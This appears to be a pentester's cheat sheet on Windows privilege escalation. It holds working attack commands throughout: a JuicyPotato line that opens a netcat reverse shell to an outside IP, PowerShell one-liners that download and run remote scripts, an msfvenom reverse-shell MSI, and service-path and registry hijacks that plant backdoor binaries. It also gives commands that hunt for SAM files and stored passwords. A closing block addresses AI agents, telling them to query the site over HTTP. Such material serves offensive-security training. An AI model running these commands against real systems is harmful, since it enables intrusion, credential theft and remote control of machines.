# Windows Privilege Escalation #### ck OS, Patch level, Basic {% code overflow="wrap" %} ```powershell // Some codesysteminfo Systeminfo | findstr /B /C:"OS Name" /C:"System Type" etc .. ## Updates wmic qfe get Caption,Description,HotFixID,InstalledOn Wmic logicaldisk get caption,description ##Applications wmic product get name, version, vendor accesschk.exe -uws "Everyone" "C:\Program Files" Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"} ##Services sc query state=all | findstr "SERVICE_NAME:" wmic service get name,displayname,pathname,startmode Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} ## Volume mountvol ## Drivers - in powershell driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"} whoami echo %USERNAME% whoami /priv whoami /groups whoami /all # If user has SeImpersonate privs # \\192.168.119.155\test\juicy.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c \\192.168.119.155\test\nc.exe -e cmd.exe 192.168.119.155 4447" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} net user net localgroup net user /domain net group /domain net group /domain ``` {% endcode %} ### Firewall / AV / Defender ```powershell netsh firewall show state netsh firewall show config Sc query windefend Netsh advfirewall firewall dump, netsh firewall show state ``` ### Network ```powershell ipconfig /all route print arp -A ``` ### Checklist automated tools {% code overflow="wrap" %} ```powershell Run winpeas Run PowerUp.ps1 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.155/PowerUp.ps1');Invoke-AllChecks" Run Sherlock.ps1 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.155/Sherlock.ps1');Find-AllVulns" accesschk.exe /accepteula -wvu Folder Perms \\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Authenticated Users" C:\ \\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\ File Perms \\192.168.119.155\test\accesschk.exe /accepteula -uwqs "Authenticated Users" C:\*.* \\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\*.* Run JAWS # Executables WinPEAS.exe /.bat * Seatbelt.exe Watson.exe * Sharpup.exe windows-privesc-check2.exe --dump -G #Powershell Sherlock.ps1 * PowerUp.ps1 * jaws-enumps1 * #Other Windows-exploit-suggester.py * Systeminfo -> a text file and run it with windows exploit suggester.py, search for exploit in SecWiki github MSF exploit suggester * In a meterpreter session – run /post/multi/recon/local_exploit_suggester - > shows list of kernel ``` {% endcode %} ### Scheduled Tasks ```powershell schtasks /query /fo LIST /v # Copy to schtasks.txt on local and run -> cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM dir %SystemRoot%\Tasks e.g. c:\windows\tasks\ e.g. c:\windows\system32\tasks\ # If we have write permissions on the scheduleded taks binary / binary dir accesschk.exe -dqv "E:\GrabLogs" copy evil-tftp.exe E:\GrabLogs\tftp.exe ``` ### Startups and autoruns ```powershell reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run wmic startup get caption,command reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" Check access on the files and dir using accesschk , if writebale , we can write malicuis binary accesschk64.exe /accepteula -wvu "C:\Program Files\Autorun Program" ``` ### Service Permissions #### Check if service config can be modified ```powershell accesschk.exe /accepteula accesschk.exe -uwcqv "Authenticated Users" * /accepteula accesschk.exe -ucqv \ sc qc \ # Get service details ``` #### Check service with weak file permission {% code overflow="wrap" %} ```powershell wmic.exe for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" sc.exe sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt FOR /F %i in (Servicenames.txt) DO echo %i type Servicenames.txt FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt ``` {% endcode %} ### Unquoted Service Path {% code overflow="wrap" %} ```powershell wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ sc query sc qc service name ``` {% endcode %} #### AlwaysInstallElevated << IF 64 bits use: %SystemRoot%\Sysnative\reg.exe ```bash reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\ Check for AlwaysInstallElevated = 1 , if yes create a msfvenom msi payload msfvenom -p windows/shell_reverse_tcp lhost= lport= -f msi -o setup.msi msiexec /quiet /qn /i C:\Temp\setup.msi ``` ### Pasword in files #### Can we find any SAM files? ```powershell %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini Findstr /si password *.config findstr /si pass/pwd *.ini dir /s *pass* == *cred* == *vnc* == *.config* in all files findstr /spin "password" *.* findstr /spin "password" *.* ``` ### Registry ```powershell ### VNC reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKCU\Software\TightVNC\Server" ### Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" ### SNMP Paramters reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" ### Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" ### Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` ### **Unquoted Service Path Exploitation** {% code fullWidth="true" %} ```powershell ## Case 1, SeShutdownPrivilege is listed when checked whoami /priv # doesn't matter even if it shows Disabled # Search for services that auto start: wmic service get name,displayname,pathname,startmode | findstr /i "auto" # Search for non-standard services wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows" # Potential unquoted service output example Heisenburg Service heisenburgsvc "C:\Program Files\Heisenburg\The One Who\knocks.exe" auto # next check if W or F permission exists for BUILTIN\Users or Everyone on one of the sub directory icacls "C:\\" # or: .\accesschk.exe /accepteula -uwdq C:\ icacls "C:\Program Files" # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files" icacls "C:\Program Files\Heisenburg" # or .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg" # Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg": # BUILTIN\Users:(F) # BUILTIN\Users:(I)(RX) # Example output for accesschk.exe: # RW BUILTIN\Users # Create reverse shell binary and copy it accordingly copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" # now reboot to have the service auto start shutdown /r /t 0 ## Case 2, SeShutdownPrivilege = Disabled, we have (service_stop,service_start) privilege on a service # Search for services that has manual start mode and non-standard wmic service get name,displayname,pathname,startmode | findstr /i "manual" | findstr /i /v "c:\windows" # Potential unquoted service output example Heisenburg Service heisenburgsvc "C:\Program Files\Heisenburg\The One Who\knocks.exe" manual # Check if we have service_stop, service_start privilege .\accesschk.exe /accepteula -ucqv user heisenburgsvc # next check if W or F permission exists for BUILTIN\Users or Everyone on one of the sub directory icacls "C:\\" # or: .\accesschk.exe /accepteula -uwdq C:\ icacls "C:\Program Files" # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files" icacls "C:\Program Files\Heisenburg" # or .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg" # Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg": # BUILTIN\Users:(F) # BUILTIN\Users:(I)(RX) # Example output for accesschk.exe: # RW BUILTIN\Users # Since there is spaces between "\The One Who\" on the path # Windows will look for "\The.exe" first, then "\The One.exe", then "\The One Who.exe", and finally "\The One Who\knocks.exe" # Create reverse shell binary and copy it accordingly copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" # Start netcat listener to catch the reverse shell and start the service net start heisenburgsvc # net stop heisenburgsvc first if the service is already running. ``` {% endcode %} **Weak Registry Permissions Exploitation** {% code overflow="wrap" %} ```powershell # Check permissions for an example service "upnphost" Get-Acl HKLM:\System\CurrentControlSet\Services\upnphost | Format-List # PowerShell # Example output, Check if NT AUTHORITY\INTERACTIVE has Full Control # Access : Everyone Allow ReadKey # NT AUTHORITY\INTERACTIVE Allow FullControl # NT AUTHORITY\SYSTEM Allow FullControl .\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\upnphost # same thing accesschk # Example output for accesschk.exe: # RW NT AUTHORITY\INTERACTIVE # KEY_ALL_ACCESS # Check if we have service_stop, service_start privilege .\accesschk.exe /accepteula -ucqv user upnphost # If both conditions are met we can start exploiting this now. # list current values of the service reg query HKLM\System\CurrentControlSet\Services\upnphost # example output: # HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\upnphost # DisplayName REG_SZ @%systemroot%\system32\upnphost.dll,-213 # ErrorControl REG_DWORD 0x1 # ImagePath REG_EXPAND_SZ %SystemRoot%\system32\svchost.exe -k LocalServiceAndNoImpersonation # ... # update ImagePath to point to our reverse shell payload reg add HKLM\System\CurrentControlSet\Services\upnphost /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\backdoor.exe /f # Start netcat listener to catch the reverse shell and start the service net start "upnphost" # net stop "upnphost" first if the service is already running. ``` {% endcode %} **Weak Service Executable File Permissions Exploitation** {% code overflow="wrap" %} ```powershell # verifying we can overwrite and existing service binary file icacls "C:\Program Files\Heisenburg\knocks.exe" # or .\accesschk.exe /accepteula -uvwq "C:\Program Files\Heisenburg\knocks.exe" # Example output if (builtin\users or EVERYONE) has ( (I) or (F) ) on "C:\Program Files\Heisenburg": # Everyone:(F) # BUILTIN\Users:(I)(RX) # Example output for accesschk.exe: # RW BUILTIN\Users # FILE_ALL_ACCESS # backup original executable copy "C:\Program Files\Heisenburg\knocks.exe" C:\Temp\ # Create reverse shell binary and overwrite the existing one copy /Y C:\Temp\backdoor.exe "C:\Program Files\Heisenburg\knocks.exe" # Start netcat listener to catch the reverse shell and start the service net start "heisenburgsvc" # net stop "heisenburgsvc" first if the service is already running. ``` {% endcode %} ### **DLL hijacking** ``` You can see the DLL search order on 32-bit systems below: 1 - The directory from which the application loaded 2 - 32-bit System directory (C:\Windows\System32) 3 - 16-bit System directory (C:\Windows\System) 4 - Windows directory (C:\Windows) 5 - The current working directory (CWD) 6 - Directories in the PATH environment variable (system then user) As a low privilege user we have little hope of putting a malicious DLL in 1-4, 5 is not a possibility in this case because we are talking about a Windows service but if we have write access to any of the directories in the Windows PATH we win. echo %path% # We can check our access permissions with accesschk or cacls accesschk.exe -dqv "C:\Python27" cacls "C:\Python27" # Before we go over to action we need to check the status of the IKEEXT service. In this case we can see it is set to "AUTO_START" so it will launch on boot! sc qc IKEEXT copy evil.dll C:\Python27\wlbsctrl.dll Restart ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://h3ckt0r.gitbook.io/0xsec/elite/network-pentest/windows-privilege-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.